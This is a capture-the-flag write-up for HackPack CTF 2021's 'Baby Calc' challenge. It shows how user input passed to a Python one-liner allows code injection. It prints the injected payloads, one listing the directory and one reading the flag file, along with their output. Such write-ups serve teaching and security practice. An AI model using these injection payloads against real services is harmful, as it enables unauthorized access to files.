HackPack CTF 2021: Baby Calc

Baby Calc

Category: pwn

50 points

We put addition in the cloud!

nc ctf2021.hackpack.club 11001

Hint: Try debugging.

File: chal

Solution

chall file looks like a ordinary binary ;-)

file chall
chall: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.s
o.2, BuildID[sha1]=e5bdadade029e7e030196070fb434cf2d92bbbad, for GNU/Linux 3.2.0, with debug_info, not stripped

But after few executions I’ve realized it’s apparently calling python to perform calculations.

./chall
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: 1
Variable two: 2
3
./chall
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: dsadas
Variable two: 4343
Traceback (most recent call last):
  File "<string>", line 1, in <module>
NameError: name 'dsadas' is not defined

Even without debugging or decompiling it became obvious.

strings chall | grep python
python3 -c 'print(%s + %s)'

Let’s exploit it :-) Firstly I’ve passed empty string as the first argument and "".join(__import__("os").listdir()) as the second one. Just to check where’s the flag.

nc ctf2021.hackpack.club 11001
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: ""
Variable two: "".join(__import__("os").listdir())
flagchal

Ok, let’s read the flag content by passing open("flag","rt").read() payload as a second argument.

nc ctf2021.hackpack.club 11001
Welcome to CloudAdd! The fastest* adder on the planet, now in cloud!
*this is not a legally binding statement
Variable one: ""
Variable two: open("flag","rt").read()
flag{cL0uD_5Tr4tEgy}

Flag

flag{cL0uD_5Tr4tEgy}

Privacy Policy
luc © 2021